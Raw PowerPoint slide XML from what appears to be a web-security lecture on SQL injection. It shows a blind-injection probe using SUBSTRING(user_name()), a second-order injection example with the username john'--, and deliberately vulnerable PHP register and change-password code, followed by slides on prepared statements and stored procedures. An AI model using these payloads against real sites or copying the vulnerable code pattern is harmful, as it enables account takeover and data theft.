              <a:t>subqueries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and functions, we can ask more complex questions (e.g., extract the name of a database table character by character)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5 AND SUBSTRING(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(), 1, 1) &lt; '?'		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4827097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48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48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48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48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48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48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48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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Second Order SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL code is injected into an application, but the SQL statement is invoked at a later point in time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>e.g., Guestbook, statistics page, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Even if application escapes single quotes, second order SQL injection might be possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attacker sets user name to: john’--, application safely escapes value to john\' -- on insertion into the database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>At a later point, attacker changes password :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>update users set password= … where username ='john'--'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428175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9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9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9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9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register.php</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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>session_start</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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = "insert into users (username, password) values ('" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($_POST['name']) . "', '" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($_POST['password']) . "');";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysq_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sql</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user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_insert_id</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$_SESSION['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'] = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74138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change_password.php</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endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>new_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = $_POST['password'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("select username, password from users where id = '" . $_SESSION['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'] . "';");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$row = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($result);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$query = "update users set password = '" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>new_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) . "' where username = '" . $row['username'] . "';";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69594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Requests – Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>OPTIONS – Request information about the communication options available on the request/response chain identified by the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>DELETE – Request that the server delete the resource identified by the URI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>TRACE – used to invoke a remote, application-layer loop-back of the request message and the server should reflect the message received back to the client as the body of the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>CONNECT – used with proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>A webserver can define arbitrary extension methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1946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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SQL Injection Solutions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Developers must never allow client-supplied data to modify SQL statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Stored procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Isolate applications from SQL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>All SQL statements required by the application are stored procedures on the database server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Statements are compiled into SQL statements before user input is added</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15321268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1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18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8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18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18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18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Injection – Prevention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specify structure of query then provide arguments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepared statements – example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>prepare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>select * from `users` where `username` = :name and `password` = SHA1( CONCAT(:pass, `salt`)) limit 1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bindParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8064A2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bindParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitize inputs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950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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SQL Injection Solutions:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stored Procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593923" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>String query = “SELECT title, description from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> WHERE id= “+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“id”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Statement stat = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>dbConnection.createStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>stat.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The first step to secure the code is to take the SQL statements out of the web application and into DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>CREATE PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>getPressRelease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> @id integer AS SELECT title, description FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> WHERE Id = @id</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
